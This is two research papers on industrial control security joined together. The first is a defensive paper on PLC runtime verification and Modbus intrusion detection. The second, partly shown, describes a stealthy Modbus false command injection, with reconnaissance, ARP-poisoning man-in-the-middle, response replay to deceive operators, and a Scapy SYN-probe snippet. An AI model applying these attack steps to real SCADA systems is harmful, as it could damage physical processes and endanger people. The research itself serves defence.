Before providing further details of our solutions, it is important to note that Industrial Control Systems should always be secured using a holistic approach, as outlined in security standards such as IEC 62443. The layered security architecture derived from IEC 62443 can be summarized by considering Plant Security, Network Security, and System Integrity, as shown in Figure 1.
Fig. 1. The Concept of Defense-in-Depth
Security solutions as applied in an industrial context must take into account these layers of protection. For example, the solutions described in this paper are part of the System Integrity layer, which supports detection of attacks.
This paper is organized as follows. First, we provide a high-level overview of how our security solutions will be integrated into PLCs, as well as our threat model, in Section II. Then we present a model for a cyber-physical verification solution that leverages the shared memory between the PLC and the embedded hypervisor in Section III. Next, we present a model for a passive intrusion detection solution within the embedded hypervisor that provides online modeling of the network traffic within the PLC in Section IV. We then show how we implemented and evaluated our security solutions in Section V. Finally, we present related work in Section VI and conclude in Section VII.

II. OVERVIEW
The two security solutions presented in this paper leverage the coupling of embedded hypervisors and PLCs. Figure 2 shows an overview of how both models would be integrated into the PLC.
For our cyber-physical verification solution, programming blocks are generated and directly integrated, synchronously or asynchronously, into the main scan cycle of the PLC, which shares memory with a library on the embedded hypervisor.
Fig. 2. System Overview. The coupled system communicates with the control system network. The PLC runs the control logic program that interfaces with the underlying physical system. The embedded hypervisor shares memory with the PLC and can run models with advanced calculations for protocol analysis and safety verification.
The threat model for this solution assumes that memory protection mechanisms are in place that can limit PLC clients to writing to designated areas of memory. As we will detail in section III, these designated areas are treated as temporary buffers; the data, along with the system state, is verified within the embedded hypervisor before being forwarded to a destination buffer. Therefore, this model assumes that an attacker cannot circumvent this mechanism by directly writing to the destination buffer. If the proprietary protocol in question has been reverse-engineered, then the attacker might have the ability to remotely program the PLC and dictate the control flow of the program.
The second solution, the IDS, allows online intrusion detection from within the PLC. The threat model assumes that the hypervisor is inaccessible, i.e., cannot be tampered with, and that the hypervisor shares the same Ethernet channel as the PLC. This allows the embedded hypervisor to directly monitor all traffic coming into the PLC Ethernet port and to model the PLC from within the embedded hypervisor.
Additionally, in both cases, the threat model assumes that a secure reporting mechanism is in place. Although the solutions provide detection mechanisms and active verification, they do not emphasize secure reporting mechanisms to the operators and/or programmers. Actionable items upon intrusion are outside of the scope of this paper.

III. CYBER-PHYSICAL VERIFICATION WITHIN A PLC SCAN CYCLE
Previous bump-in-the-wire verification solutions have been implemented in order to symbolically verify the logic programs downloaded to a PLC against temporal safety properties. However, these solutions rely heavily on the soundness and completeness of their external, offline verification solutions. There is an inherent difficulty in defining and verifying cyber-physical safety properties given the variety of inputs in a typical PLC program and the complexity of the underlying physical invariant properties. Similarly, IDS models are passive external security solutions, and previously proposed models seem to have only been implemented for offline traffic analysis. In both cases, there is no active verification of values written to memory in the PLC.
Fig. 3. CPS Verification: (1) PG/Client/HMI writes to the temporary buffer; (2) a function in the verification library is called to verify this value; (3) if the value doesn't violate safety constraints, the value in the temporary buffer is transferred to the destination buffer.
PLCs support memory protection and access control, but several programs still provide PLC clients with the capability of modifying the variables that represent discrete attributes of the cyber-physical solution. Using PLCs coupled with embedded hypervisors, active verification of values written to memory can be implemented and directly integrated into the scan cycle of a PLC. Our solution leverages this coupling to verify values written to areas of memory in the PLC. A high-level overview and control flow of a sample solution is presented in Figure 3.
The solution works by restricting writes to PLC memory to designated temporary buffers. When a write to the temporary buffer is detected, the functional programming block associated with the embedded hypervisor library function is invoked and passes the system state to the embedded hypervisor. The written value is verified against previously defined temporal safety properties based on the underlying physical model and the current system state. If the value written to the temporary buffer doesn't violate any safety or security constraints, the embedded hypervisor returns a signal to the PLC that allows this value to be forwarded to the destination memory buffer. Otherwise, the transfer is blocked and a notification can be raised to the operator that an unsafe command has been issued.
Fig. 4. Passive IDS implementation within the embedded hypervisor. The PLC and the hypervisor listen on the same port. The hypervisor maintains a model of the traffic for anomaly detection, such as the expected queries (Q) and responses (R) in an Ethernet protocol, in parallel to the PLC running the control logic program.
The purpose of interacting with the embedded hypervisor is to provide the ability to perform advanced calculations on the underlying physical system model. For example, if a PLC is controlling significant components of an electric power grid, e.g., circuit breakers and tap changers of transformers, the embedded hypervisor can take care of running optimal power flow equations to determine the impact of a particular action in real time, e.g., opening/closing a circuit breaker.

IV. AUTOMATON-BASED CONTROLLER ANOMALY DETECTION
The embedded hypervisors can also be used to implement an online IDS from within the PLC. IDS solutions have been proposed for modeling PLC traffic for the purpose of detecting malicious packets. Our solution is based on the deterministic finite automaton (DFA) solution presented in [8] and [6]. Figure 4 presents a simple DFA example for Modbus traffic. In this system, an expected periodic traffic pattern is a sequence of four packets: a first query (Q1), a response to the first query (R1), a second query (Q2), and a response to the second query (R2). If a subsequent packet represents the next expected state in the pattern, then we have a Normal transition from one DFA state to the next. If the subsequent packet is the same as the current packet, then we have a Retransmission and the DFA remains in the same state. If the subsequent packet is not the expected packet but is within the subset {Q1, R1, Q2, R2}, then we have a Miss and the DFA state transitions to the state of the subsequent packet. If the subsequent packet is not the expected packet and is not within this subset, then we have an Unknown and the DFA transitions to the beginning of the pattern sequence.
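As an illustration of the transition rules just described, the following minimal Python sketch (an assumption on our part, not the authors' hypervisor implementation) classifies a stream of packet symbols against a learned periodic pattern, returning Normal, Retransmission, Miss, or Unknown for each symbol.

```python
# Minimal sketch of the DFA transition classification described above.
# `pattern` is the learned periodic sequence of packet symbols (e.g. header
# tuples); classify() consumes observed symbols one at a time.
from typing import List

class PeriodicDFA:
    def __init__(self, pattern: List[str]):
        self.pattern = pattern
        self.state = 0                      # index of the next expected symbol

    def classify(self, symbol: str) -> str:
        expected = self.pattern[self.state]
        previous = self.pattern[self.state - 1]
        if symbol == expected:              # next expected symbol in the pattern
            self.state = (self.state + 1) % len(self.pattern)
            return "Normal"
        if symbol == previous:              # same as the current symbol: stay put
            return "Retransmission"
        if symbol in self.pattern:          # known symbol, wrong position: jump there
            self.state = (self.pattern.index(symbol) + 1) % len(self.pattern)
            return "Miss"
        self.state = 0                      # unknown symbol: restart the pattern
        return "Unknown"

# Example with the four-packet Modbus pattern from the text:
dfa = PeriodicDFA(["Q1", "R1", "Q2", "R2"])
for pkt in ["Q1", "R1", "R1", "Q2", "R2", "Q2", "EVIL"]:
    print(pkt, "->", dfa.classify(pkt))
```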
An Unknown transition is the worst type of transition and can generally be expected to indicate an intrusion. Further details of the DFA algorithm, as well as its application to specific PLC Ethernet protocols, can be found in the aforementioned papers.

V. EVALUATIONS
In this section, we present our evaluations and implementations of the two proposed security solutions. Both of our solutions were implemented using the SIMATIC ET 200SP Open Controller, CPU 1515 PC. The PLC has a hypervisor with Windows Embedded 7E 32-Bit. We used the SIMATIC WinAC Open Development Kit (ODK) to implement both of our solutions. The WinAC ODK provides an API for Microsoft Visual Studio that allows developers to generate DLLs with the desired library functions to be stored on the embedded hypervisor, while also generating the associated programming blocks that are directly downloaded to the PLC and can interface with the DLL through shared memory.
Fig. 5. CPS Verification Solution. The WinAC ODK implementation allows the main scan cycle programming block, OB1, to invoke the automatically generated functional programming blocks, FB, associated with the verification library functions of the DLL located in the embedded hypervisor. The data block, HMI2PLC DB, can be written to by the legitimate HMI panel of our cyber-physical system or by a malicious client on the network.

A. Cyber-physical Verification Solution
The previous simple scenario was directly integrated into a cyber-physical simulation program. Figure 5 provides an overview of the cyber-physical system used in our solution. The associated physical system in this scenario is a laser-cutting tool that places materials onto a cutting platform and cuts a particular shape specified by the operator. Typically the HMI reads from and writes to a specific DB, which we labeled HMI2PLC. We developed an attack scenario in which a hacker uses a Snap7 client to inject malicious packets that alter this DB. We integrated the WinAC ODK functions directly into the main cyclic programming block, OB1.
Table I provides the safety specifications of our sample security solution. The first safety specification states that the system should not receive a manual direction signal moving the cutter up, down, left, or right while the system is in Auto mode, meaning that the cutting should be automatic. When OB1 detects a direction signal, a call to the associated WinAC ODK function is triggered. The WinAC ODK function will then check the relevant status bits and, if there is a violation of the safety specification, it will raise an alarm (e.g., a notification will be raised on the HMI panel). The second safety specification states that the laser-cutter's homing position (i.e., the position the cutter returns to when it has finished a full cutting cycle) cannot change while the system is not in Auto mode and the system is not in Idle mode, which is simply the mode indicating that the cutter is standing idle. If OB1 detects that either the X- or Y-coordinate of the homing position setting has changed, it will invoke the associated WinAC ODK function in the same manner to verify the change against these safety rules.
If the WinAC ODK function detects a violation, it will raise a signal that forces the system to finish the current cutting cycle and stop production until the operator acknowledges the intrusion. The final specification states that the cutting speed of the laser cannot change while in Auto mode and while the Cutting indicator is true. If OB1 detects a change in the cutting speed, it will invoke another WinAC ODK function that issues an Emergency Stop signal if the rule was violated.
TABLE I: SAFETY SPECIFICATIONS FOR LASER-CUTTING SYSTEM
Trigger Signal                      | Safety Conditions      | Violation Response
Manual Direction Click (↑, ↓, ←, →) | !(Auto)                | Notification
Home Position Changed               | !(Auto) && !(Idle)     | Stop Production
Cutting Speed Changed               | !(Auto) && !(Cutting)  | Emergency Stop
Although these rules could have been easily implemented using simple ladder logic or STL programming, they serve as placeholders for advanced calculations based on physical equations. Our goal was to demonstrate a highly coupled PLC verification solution. Furthermore, these solutions can be directly integrated into the scan cycle timing and allow developers to account for the verification solution in their timing specifications. The associated programming blocks can be invoked synchronously or asynchronously depending on the safety/operational requirements of the scan cycle. This IDS relies on the assumption that the proprietary protocol is not reverse-engineered. If the PLC's programming protocol(s) are reverse engineered, a hacker who is able to establish a programming connection to the PLC can simply program blocks that overwrite or skip over the security implementation.
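The decision logic of Table I is simple enough to sketch. The following Python snippet is only an illustrative model of the hypervisor-side checks and an assumption on our part (the actual implementation is a WinAC ODK DLL invoked from OB1): given the system state bits and a trigger, it returns the violation response from Table I, or None if the write is allowed.

```python
# Illustrative model of the Table I checks (not the actual WinAC ODK DLL).
# State flags and trigger names mirror the table; the mapping of a violation
# to a response string is hypothetical glue code.
from dataclasses import dataclass
from typing import Optional

@dataclass
class SystemState:
    auto: bool      # system is in Auto mode
    idle: bool      # cutter is standing idle
    cutting: bool   # Cutting indicator

def check_trigger(trigger: str, state: SystemState) -> Optional[str]:
    """Return the violation response for a trigger, or None if it is safe."""
    if trigger == "manual_direction_click":
        # Safe only while not in Auto mode.
        return None if not state.auto else "Notification"
    if trigger == "home_position_changed":
        # Safe only while not in Auto and not in Idle mode (per Table I).
        return None if (not state.auto and not state.idle) else "Stop Production"
    if trigger == "cutting_speed_changed":
        # Safe only while not in Auto and not Cutting (per Table I).
        return None if (not state.auto and not state.cutting) else "Emergency Stop"
    return None  # unrecognized triggers are ignored in this sketch

# Example: a manual jog command arriving while the system runs in Auto mode.
print(check_trigger("manual_direction_click", SystemState(auto=True, idle=False, cutting=False)))
```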
Therefore, our plugin will queue the first 6000 packets, which are assumed to be benign. Starting at a pattern length of 2 and increasing up to 1500, we check to see which pattern length best fits the periodic data. A pattern's performance is essentially determined by the number of Normals over the total number of transitions (Normals + Misses + Retransmissions + Unknowns). Once we select an appropriate pattern, we can then set this pattern as our DFA. Each subsequent symbol is checked against this DFA, and any Misses, Retransmissions, or Unknowns will be reported accordingly. In our solution, we had the program write a portion of memory that would signal an alarm whenever an Unknown symbol was detected. Furthermore, we had to modify our validation window size and max pattern length, as the simulation program generated many more symbols than 1500 in one cycle.

We reinforced the IDS solution by ensuring that Retransmission packets were valid. Because the DFA solution discards the actual data values being written to variables, an attacker could generate a packet that has the same symbols as a previous packet and manipulate the data. Because the pattern is periodic, the attacker can then find a way to inject the packet so that it lands in the sequence just before or after the same packet in the pattern. The DFA solution would simply identify this packet, along with the extra acknowledgement packet, as Retransmission symbols (since there will most likely be two acknowledgement packets in a row). To resolve this issue, we simply keep a data buffer that holds the data of the previous packet. If the current packet is identified as a Retransmission, we just compare the two data buffers and make sure nothing has been changed. Although this does not mitigate the case for Misses (as the data would not be expected to be the same), we can guarantee that valid Retransmissions are benign.

In addition to not being able to validate Miss packets, there are a couple of limitations with this IDS solution. First, it relies on the data being highly periodic. For fully automated systems where there is little to no human interaction, our IDS solution would have an extremely high intrusion-detection accuracy. However, most industrial control systems involve operators who use HMI panels to send commands to the PLCs. The simulation program was designed to simulate an operator that starts the cutting process at some point between 1 and 10 seconds into every cycle. This operation will generate one symbol, i.e., the packet the operator sends to start the cutting process. This symbol will almost always be identified as a Miss, since the operator starts the process at a different point in the pattern sequence every time. This false positive could most likely be mitigated by adapting the learning process to the application-specific pattern. There are many ways to modify the algorithm by incorporating supervised learning. As a standalone, unsupervised process, though, our algorithm can only guarantee that Normal, Retransmission, and Unknown packets will be properly identified and handled accordingly. However, the goal of this solution was to present a sample IDS solution that can be embedded within the PLC. Having an advanced embedded hypervisor coupled with the PLC allows the system to provide online deep-packet inspection.

VI. RELATED WORK

In this section, we will present several related verification and security solutions for PLCs. It is worth noting that our
solutions emphasize the ability to verify and secure the PLC from within the device, not the security models themselves. We first review works related to the guidelines associated with securing control systems. In [10], NIST guideline security architectures are presented for ICS with respect to supervisory control and data acquisition systems, distributed control systems, and PLCs. Similar guidelines for the energy industry are presented in [11] and [12]. [13] and [14] argue that compliance with these standards provides a false sense of security.

We now discuss previous security and verification solutions presented for control systems. TSV [4] presented an external bump-in-the-wire verifier for process controller code downloaded to the PLC. Mohan et al. [15] introduced a monitor that dynamically checks the safety of plant behavior. Offline intrusion detection solutions have been proposed to model PLC traffic as a deterministic finite automaton in [8] and [6]. Another model-based intrusion detection approach was proposed in [16]. In all cases, the security solutions were implemented as external solutions, as opposed to within the PLC. Avatar [17] provides a framework to support dynamic security analysis of embedded systems firmware. However, the firmware resides below the control-logic level, and security/verification solutions cannot be easily integrated into the scan cycle of the PLC. In general, our solution focuses more on application-level security solutions. [18] uses mathematical analysis techniques to evaluate various aspects, such as safety and reliability, of a given control system, but focuses on accidental failures and not malicious actions. PLC vendors themselves typically use basic security mechanisms with a single privilege level [4].

VII. CONCLUSIONS

In this paper we presented two security models for PLCs that leverage the advanced computational power of embedded hypervisors that are coupled with PLCs. We evaluated implementations of both models on a real PLC on a simulated cyber-physical system with unpredictable operation.

ACKNOWLEDGEMENT

The authors would like to express their gratitude to George Trummer, Stefan Woronka, Ben Collar and Frank Garrabrant for their insightful feedback and constructive suggestions. This material is based upon work supported by Siemens as well as the Department of Energy under Award Number DE-OE0000780.

REFERENCES
[1] US ICS-CERT. (2015) ICS-CERT Monitor, November/December 2015. https://ics-cert.us-cert.gov/monitors/ICS-MM201512.
[2] D. Nardella. (2015) Snap7 Overview. http://snap7.sourceforge.net/.
[3] J. Klick, S. Lau, D. Marzin, J.-O. Malchow, and V. Roth, "Internet-facing PLCs - a new back orifice."
[4] S. E. McLaughlin, S. A. Zonouz, D. J. Pohly, and P. D. McDaniel, "A trusted safety verifier for process controller code," in Proceedings of the Network and Distributed System Security (NDSS) Symposium, 2014.
[5] S. Zonouz, J. Rrushi, and S. McLaughlin, "Detecting industrial control malware using automated PLC code analytics," IEEE Security & Privacy, vol. 12, no. 6, pp. 40-47, 2014.
[6] A. Kleinman and A. Wool, "Accurate modeling of the Siemens S7 SCADA protocol for intrusion detection and digital forensics," The Journal of Digital Forensics, Security and Law (JDFSL), vol. 9, no. 2, p. 37, 2014.
[7] Siemens. (2009) SIMATIC Windows Automation Center RTX Open Development Kit (WinAC ODK).
https://cache.industry.siemens.com/dl/files/966/35948966/att 82094/v1/winac odk user manual en-US en-US.pdf.
[8] N. Goldenberg and A. Wool, "Accurate modeling of Modbus/TCP for intrusion detection in SCADA systems," International Journal of Critical Infrastructure Protection, vol. 6, no. 2, pp. 63-75, 2013.
[9] Wireshark. (2016) tshark. https://www.wireshark.org/docs/man-pages/tshark.html.
[10] National Energy Regulatory Commission, "NERC CIP 002-1 - Critical Cyber Asset Identification," 2006.
[11] K. Stouffer, J. Falco, and K. Scarfone, "Guide to industrial control systems (ICS) security," NIST Special Publication, vol. 800, no. 82, pp. 16-16, 2011.
[12] R. Carlson, J. Dagle, S. Shamsuddin, and R. Evans, "A summary of control system security standards activities in the energy sector," Department of Energy, p. 48, 2005.
[13] J. Weiss, "Are the NERC CIPs making the grid less reliable," Control Global, 2009.
[14] L. Piètre-Cambacédès, M. Tritschler, and G. N. Ericsson, "Cybersecurity myths on power control systems: 21 misconceptions and false beliefs," IEEE Transactions on Power Delivery, vol. 26, no. 1, pp. 161-172, 2011.
[15] S. Mohan, S. Bak, E. Betti, H. Yun, L. Sha, and M. Caccamo, "S3A: secure system simplex architecture for enhanced security of cyber-physical systems," arXiv preprint arXiv:1202.5722, 2012.
[16] S. Cheung, B. Dutertre, M. Fong, U. Lindqvist, K. Skinner, and A. Valdes, "Using model-based intrusion detection for SCADA networks," in Proceedings of the SCADA Security Scientific Symposium, vol. 46. Citeseer, 2007, pp. 1-12.
[17] J. Zaddach, L. Bruno, A. Francillon, and D. Balzarotti, "Avatar: A framework to support dynamic security analysis of embedded systems' firmwares," in NDSS, 2014.
[18] W. M. Goble, Control Systems Safety Evaluation and Reliability. ISA, 2010.
Detecting PLC Control Corruption via On-Device Runtime Verification
Luis Garcia, Saman Zonouz, Department of Electrical & Computer Engineering, Rutgers University, Piscataway, New Jersey 08854, {l.garcia2, saman.zonouz} [email protected]
Dong Wei, Leandro Pfleger de Aguiar, Siemens Corporation, Corporate Technology, Princeton, New Jersey 08540, {dong.w, leandro.pfleger} [email protected]
A_Stealthy_False_Command_Injection_Attack_on_Modbus_based_SCADA_Systems.pdf
Modbus is a widely-used industrial protocol in Supervisory Control and Data Acquisition (SCADA) systems for different purposes such as controlling remote devices, monitoring physical processes, data acquisition, etc. Unfortunately, such a protocol lacks security means, i.e., authentication, integrity, and confidentiality. This has exposed industrial plants using the Modbus protocol and made them attractive to malicious adversaries who could perform various kinds of cyber-attacks causing significant consequences, as Stuxnet showed. In this paper, we exploit the insecurity of the Modbus protocol and perform a stealthy false command injection scenario, concealing our injection from the SCADA operator. Our attack approach is comprised of two main phases: 1) a pre-attack phase (offline), where an attacker sniffs, collects and stores sufficient valid request-response pairs in a database, and 2) an attack phase (online), where the attacker performs false command injection and conceals his injection by replaying a valid response from his database upon each request sent from the HMI user. Such a scenario is quite severe and might cause disastrous damage in SCADA systems and critical infrastructures if it is successfully implemented by malicious adversaries. Finally, we suggest some appropriate mitigation solutions to prevent such a serious threat.
A Stealthy False Command Injection Attack on Modbus based SCADA Systems
Wael Alsabbagh (1,2), Samuel Amogbonjaye (2), Diego Urrego (2) and Peter Langendörfer (1,2)
(1) IHP Leibniz-Institut für innovative Mikroelektronik, Frankfurt (Oder), Germany
(2) Brandenburg University of Technology Cottbus-Senftenberg, Cottbus, Germany
{Alsabbagh, Langendoerfer}@ihp-microelectronics.com, {urregdie, amogbolu}@b-tu.de

Index Terms: SCADA; PLCs; ICSs; Modbus Protocol; Cyber-attacks; Command Injection Attacks

I. INTRODUCTION

Supervisory Control and Data Acquisition (SCADA) systems are employed by millions of industries and plants to monitor and control critical physical processes such as oil and gas facilities, water treatment systems, nuclear plants, electrical power grids, etc. SCADA systems provide users with fully automated control, as well as remote access and service monitoring. Typical SCADA systems consist of different industrial components, e.g., Engineering Work Stations (EWSs), Human Machine Interfaces (HMIs), Programmable Logic Controllers (PLCs), Input/Output (I/O) modules, sensors, valves, motors, and others [1]. Due to the necessity of having remote management in critical infrastructures, SCADA systems are increasingly connected to Ethernet and Transmission Control Protocol/Internet Protocol (TCP/IP) based networks, e.g., the Internet, as well as Virtual Private Network (VPN)-based remote access to reduce maintenance costs [2]. Unfortunately, this connectivity brings its own risks and exposes millions of systems to cyber-attacks from the outer world that did not exist in the air-gapped era [3].

The security of SCADA systems has recently been a major focus of cyber-security researchers and industrial engineers due to the critical role these systems play in any automation company. It is not a secret that many old SCADA components with no security measures are still operating in many critical plants, for two major reasons. First, industrial devices have a long life-cycle (twenty years or longer), which results in them not being security patched (up-to-date) for a while. Secondly, there may be legacy devices that are not compatible with newer, security-improved protocols. We should therefore expect that many insecure SCADA devices are placed in remote locations and linked to the outer world via the Internet. Thus, if a skilled adversary gains access to a SCADA network, he can perform malicious attacks to disrupt the physical process that the target system controls, which eventually might cause serious damage, as Stuxnet [4], BlackEnergy [5], Shamoon [6], Kemuri [7] and the German Steel Mill incident [8] showed.

Along with the system-level security concerns, SCADA protocols such as Modbus, Distributed Network Protocol (DNP3), High Level Data Link Control (HDLC), International Electrotechnical Commission (IEC) 60870, etc. are substantially vulnerable and lack fundamental security mechanisms [9]. All these protocols provide client/server communications between different SCADA devices connected on different buses or networks. The Modbus protocol [10] is believed to be the most common industrial protocol, implemented by hundreds of vendors on thousands of device models to transfer digital/analog inputs/outputs and register data between the connected devices, e.g., HMIs and PLCs.
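As a point of reference for the request/response traffic discussed throughout the paper, the short sketch below shows the kind of read transaction an HMI-side Modbus/TCP master performs against a PLC acting as slave. It is illustrative only: the IP address and register addresses are placeholders, and the keyword arguments assume a recent pymodbus 3.x release (older releases use unit= instead of slave=).

```python
# Illustrative HMI-style polling of a Modbus/TCP slave (assumes pymodbus 3.x).
from pymodbus.client import ModbusTcpClient

client = ModbusTcpClient("192.168.0.10", port=502)   # placeholder PLC address
if client.connect():
    # read two holding registers starting at address 0 from unit/slave id 1
    rr = client.read_holding_registers(address=0, count=2, slave=1)
    if not rr.isError():
        print("holding registers:", rr.registers)
    client.close()
```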
Although Modbus provides the industrial community with simplicity, applicability, and efficiency, it contains multiple vulnerabilities that have allowed attackers to exploit the insecurity of the protocol and conduct different attacks, e.g., reconnaissance activity, command injection, data injection, access injection, etc. Hijacking the interconnection between PLC and HMI devices represents the most often used attack scenario targeting SCADA systems using Modbus, such as the one that occurred in the Maroochy water breach [11].

In this work, we introduce a stealthy False Command Injection (FCI) attack approach based on integrating a database containing real Modbus request-response pairs between PLC and HMI devices. The database is created prior to the launch of our attack, i.e., offline. In our approach, an attacker placed in a man-in-the-middle (MITM) position intercepts the Modbus requests sent from the HMI, dropping them from the network so they do not reach the PLC, compares them to the ones existing in his database, and then replies to the HMI with the expected responses. Meanwhile, he can inject the PLC with false commands, i.e., sending malicious requests that alter inputs or outputs, causing dangerous behavior at will. In other words, our approach effectively decouples the PLC from the HMI, i.e., it generates two independent communication flows: one between the PLC and the attacker, and the other between the attacker and the HMI. This scenario is quite severe, as the SCADA operator is tricked in a way that he is always shown fake views while the PLC is processing malicious commands sent by the attacker. For a practical implementation, we conducted our approach on a virtual SCADA system based on OpenPLC (https://openplcproject.com/) and ScadaBR (http://www.scadabr.com.br/) software. This is due to logistic constraints and the difficulty of using real-world SCADA systems for research purposes. Finally, we suggest some security countermeasures and mitigation solutions to prevent such a serious threat.

The rest of the paper is structured as follows. Section II discusses related work, while Section III provides a security overview of the Modbus protocol. In Section IV, we illustrate our attack approach, and we show the implementation as well as the resulting evaluation in Section V. Finally, we suggest some security countermeasures and appropriate mitigation solutions in Section VI, and conclude this paper in Section VII.

II. RELATED WORK

The Modbus protocol is, on the one hand, very simple, efficient and publicly free; on the other hand, it has many vulnerabilities that allow an adversary to perform reconnaissance activity or use arbitrary commands. Possible vulnerabilities in the Modbus specification and in major implementations of the protocol were investigated by Huitsing et al. [12]. Such weaknesses can be exploited to perform spoofing, replay, and flooding attacks. Morris et al. [13] illustrated theoretical data injection and Denial of Service (DoS) attacks against industrial equipment that relies on Modbus. Such attacks stem from the protocol's insufficient security measures for data integrity and availability.
Morris, in a follow-up work [14], described and tested reconnaissance, response injection, command injection, and DoS attacks, and also elaborated on several standalone and stateful Intrusion Detection System (IDS) rules in an attempt to deter such incidents. Nardone et al. [15] formally analyzed and assessed the Modbus protocol in terms of the security features each variant provides. The work by Tsalis et al. [16] demonstrated that, even in the presence of encryption, side-channel attacks might reveal information about Modbus protocol messages. Using a testbed comprising virtual machines running on Linux, Parian et al. [17] detailed two attacks, namely manipulation of packets via malware-infected hosts and classic MITM attacks, i.e., Address Resolution Protocol (ARP) poisoning.

Rosa et al. [2] showed the implementation of a set of attacks targeting a Hybrid Environment for Design and Validation (HEDVa). For a practical attack scenario, the authors built and configured a small testbed controlled by Modbus PLCs. As part of their work, they conducted network reconnaissance and a MITM attack, and finally injected PLCs with dangerous Read/Write (R/W) coils requests.

All the aforementioned works focused on confusing the physical processes controlled by exposed PLCs using the vulnerabilities of the Modbus protocol. However, the SCADA operator could easily detect and disclose these attacks, as he can observe abnormal changes displayed on the HMIs. In our paper, we overcome this challenge and conceal our attack by sending the HMI fake views similar to the ones it expects to receive, as illustrated in Section IV.

III. MODBUS PROTOCOL AND VULNERABILITIES

Modbus is an application-layer messaging protocol located at the seventh level of the OSI model (https://www.fortinet.com/resources/cyberglossary/osi-model). It provides master/slave communication between devices connected on different buses and networks. Figure 1 depicts a typical SCADA communication in which a data acquisition server or an HMI runs as a Modbus client component (master) and a PLC runs as its pair device, that is, a server component (slave).

Fig. 1: Example of interaction between Modbus master and slave devices

The master device (HMI) sends a Modbus request to the connected slave device (PLC) to poll the data. The PLC replies to the request with a Modbus response to the HMI. If the request is not correct, the PLC returns an exception response to the HMI. Figure 2 shows the architecture of a Modbus frame encapsulated over the TCP/IP protocol. The Function Code field determines the action the PLC is required to perform. Table I gives the details of some function codes and their corresponding actions. These function codes are the most frequently used in interactions between PLCs and HMIs in SCADA systems. The Modbus protocol itself lacks various security features, which exposes it to cyber-attacks that hijack the Modbus communication between the connected devices and manipulate the frames to inject false commands/data into the PLC. In the following, we list the most reported vulnerabilities of the Modbus protocol, as described in [19]-[21]:
Fig. 2: Modbus TCP/IP frame format, adopted from [18]

Table I: Function codes and their corresponding actions
Function Code | Modbus Function
0x01 | Read Coil Status
0x02 | Read Discrete Input
0x03 | Read Holding Registers
0x04 | Read Input Registers
0x05 | Write Single Coil
0x06 | Write Single Holding Register
0x0F | Write Multiple Coils
0x10 | Write Multiple Holding Registers
0x11 | Report Slave ID

- The integrity of the Modbus frame is not verified by the peer devices [22], [23]. The frame can be altered by an attacker, and the peer devices cannot reveal this manipulation.
- There is no facility for maintaining the confidentiality of messages. Modbus frames are transferred in plain text, and any attacker placed in a MITM position can sniff the packets and access the frame information.
- It does not support time-stamps for the frames. This is one of the critical problems, because peer devices cannot know whether the received response was obtained for the recent or an old request. Therefore, manipulation may happen due to a mismatch of real-time field values.
- Modbus is an open protocol and has a simple frame format. Thus, a network analyzer tool such as Wireshark (https://www.wireshark.org/) can be used by an attacker to retrieve the information from the network.

As a result of lacking the aforementioned security measures, Modbus is highly vulnerable to various cyber-attacks such as MITM attacks in the form of False Command Injection (FCI), False Access Injection (FAI), False Response Injection (FRI), replay attacks and DoS attacks [24]-[27].

IV. ATTACK DESCRIPTION

Figure 3 shows a high-level overview of the attack scenario we perform to inject the PLC with false commands without being noticed by the HMI device. To this end, we first need to discover the network topology of the target system, then collect Modbus TCP/IP packets from the network traffic to create our database, which eventually contains real request-response interaction pairs. These two steps are done prior to our injection attack. After collecting the needed pairs, we start our main attack by poisoning the ARP cache of the connected devices, i.e., the HMI and PLC, and then inject the target PLC with false commands whilst we send the expected response packet upon each request to the HMI. This conceals our attack, and the SCADA operator will always be shown the fake views that he is expecting to see. In the following, we elaborate each attack step in detail.

A. Pre-Attack Phase (Offline)

Here, the attacker aims to get an overview of the network topology, open ports, connected devices, and communication protocols used in the target system. Then, he sniffs and collects real interactions between the HMI and PLC, i.e., request-response pairs that both stations exchange over Modbus TCP/IP frames.

1) Network Reconnaissance: Discovering the network is the first step that an attacker needs to take, meant to collect information/data about all the components of the SCADA environment and to identify the network topology, hosts and services. For instance, industrial devices such as PLCs and HMIs are identified by IP and Media Access Control (MAC) addresses, operating system versions and a set of services. Thus, to obtain these addresses and this information we used the NMAP port scanner (https://nmap.org/), which identifies the Modbus protocol on the network. Figure 4 shows the scanning process, where synchronize (SYN) packets are sent from the attacker machine over the network.
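The half-open SYN probing described above can also be reproduced with a few lines of Scapy. The sketch below is illustrative only: the target address is a placeholder, TCP port 502 is used because it is the registered Modbus/TCP port, and such probes should of course only be sent against lab equipment you are authorized to test.

```python
# Minimal half-open (SYN) probe for a single Modbus/TCP port, using Scapy.
from scapy.all import IP, TCP, sr1, send, conf

conf.verb = 0                                   # silence Scapy's own output

def syn_probe(ip, port=502, timeout=1.0):
    """Return True if the port answers with SYN/ACK (service likely listening)."""
    syn = IP(dst=ip) / TCP(dport=port, flags="S")
    reply = sr1(syn, timeout=timeout)
    if reply is not None and reply.haslayer(TCP) and reply[TCP].flags == "SA":
        # never complete the handshake: tear the half-open connection down
        send(IP(dst=ip) / TCP(dport=port, flags="R"))
        return True
    return False

print(syn_probe("192.168.0.10"))                # placeholder lab PLC address
```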
Fig. 4: Network Reconnaissance Attack

Using this technique, SYN packets can scan thousands of ports per second, due to the fact that the TCP connection is never fully established (half-open communication). It is therefore difficult to detect with default network rules.

2) Sniffing and Collecting Data: The NMAP tool provides the attacker only with a perspective on the target system from the network point of view; that is, it does not provide process-level information, which is required to implement sophisticated attacks. Thus, in the next step the attacker listens to the network traffic and captures each Modbus TCP/IP request frame sent from the HMI alongside its corresponding Modbus response(s) from the PLC. To this end, we first run a network analyzer, e.g., Wireshark. Our investigations showed that each request and its corresponding response(s) share the same Transaction Identifier (TID), Unit ID (which indicates how many frames the response from the PLC is comprised of), and Function Code. Encapsulated Modbus protocol messages can therefore be extracted and grouped into request-response pairs based on those three parameters. Figure 5 shows an example of a Modbus interaction between PLC and HMI devices where the response from the PLC consists of two frames, and all the frames (request and response) have the same values: 0x19bd in TID, 0x02 in Unit ID, and 0x03 in Function Code.

Fig. 3: High-level overview of our attack approach

Fig. 5: Example of a Modbus request-response interaction between PLC and HMI

